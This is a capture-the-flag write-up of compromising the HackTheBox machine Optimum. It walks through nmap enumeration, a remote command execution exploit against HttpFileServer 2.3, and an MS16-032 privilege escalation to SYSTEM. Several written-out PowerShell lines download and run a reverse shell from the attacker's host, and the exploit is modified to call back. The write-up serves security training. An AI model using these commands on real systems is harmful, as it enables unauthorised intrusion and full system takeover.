Optimum is a vulnerable virtual machine created by ch4p on HackTheBox. In this post, we document a complete walkthrough of pwning this machine.
Enumeration
Nmap
Starting off with the nmap scan, we discover that the target is a Windows machine running HttpFileServer httpd 2.3 on port 80.
1
2
3
4
5
6
7
8
9
10
$ nmap -sC -sV -oA recon/default 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.091s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Exploitation
By searching available exploits for this service on Exploit DB, we get a few exact matches for the version 2.3.
1
2
3
4
5
$ searchsploit httpfileserver
...
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) ... | windows/webapps/49125.py
A ping command can be used to test the exploit.
1
$ python 49125.py 10.10.10.8 80 "ping.exe -n 1 10.10.14.18"
We set up tcpdump to see if the target pings us.
1
2
3
4
5
$ sudo tcpdump -i tun0 icmp
...
06:13:37.143895 IP 10.10.10.8 > 10.10.14.18: ICMP echo request, id 1, seq 25, length 40
...
We see that we have achieved code execution on the target. Next, we will try to get a reverse shell. To do this, a copy of Invoke-PowerShellTcp.ps1 from nishang named rev.ps1 is served on our Kali box with python HTTP server. Afterwards, we use the following command to execute the reverse shell code on the target.
1
$ python 49125.py 10.10.10.8 80 "powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/rev.ps1')"
The reverse shell comes back as expected after our ncat listener is set up.
1
2
3
4
5
6
7
$ rlwrap ncat -nlvp 4444
...
PS C:\Users\kostas\Desktop> whoami
whoami
optimum\kostas
Privilege Escalation
We use the same approach to execute sherlock.ps1 from PowerShell Empire on the target to check vulnerabilities. The script has found two available exploits.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/sherlock.ps1')
...
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
First, we will try MS16-032. The exploit script for MS16-032 can be found in PowerShell Empire as well. The following line is appended to the end of the script, so that we will get a reverse shell when the exploit runs.
1
Invoke-MS16-032 -Cmd "iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/rev.ps1')"
After putting the script into our HTTP server directory, we execute the script on the target.
1
2
3
4
5
6
7
8
9
10
11
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/ms16032.ps1')
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handles..
[!] No valid thread handles were captured, exiting!
Unfortunately, our first attempt does not work. By issuing the following commands, we find that our powershell process is 32-bit, which causes the exploit to fail.
1
2
3
4
PS C:\Users\kostas\Desktop> [Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop> [Environment]::Is64BitProcess
False
Now we redo the reverse shell with a 64-bit powershell binary.
1
2
3
4
5
6
$ python 49125.py 10.10.10.8 80 "C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/rev.ps1')"
...
PS C:\Users\kostas\Desktop> [Environment]::Is64BitProcess
True
We try the MS16-032 exploit again in the 64-bit session. This time it is successful.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/ms16032.ps1')
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handles..
[?] Done, got 4 thread handle(s)!
[?] Thread handle list:
2832
2500
2952
2560
[*] Sniffing out privileged impersonation token..
[?] Trying thread handle: 2832
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 3596
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
Checking our ncat listener, we get a reverse shell with system privilege.
1
2
3
4
5
6
7
$ rlwrap ncat -nlvp 4444
...
PS C:\Users\kostas\Desktop> whoami
whoami
nt authority\system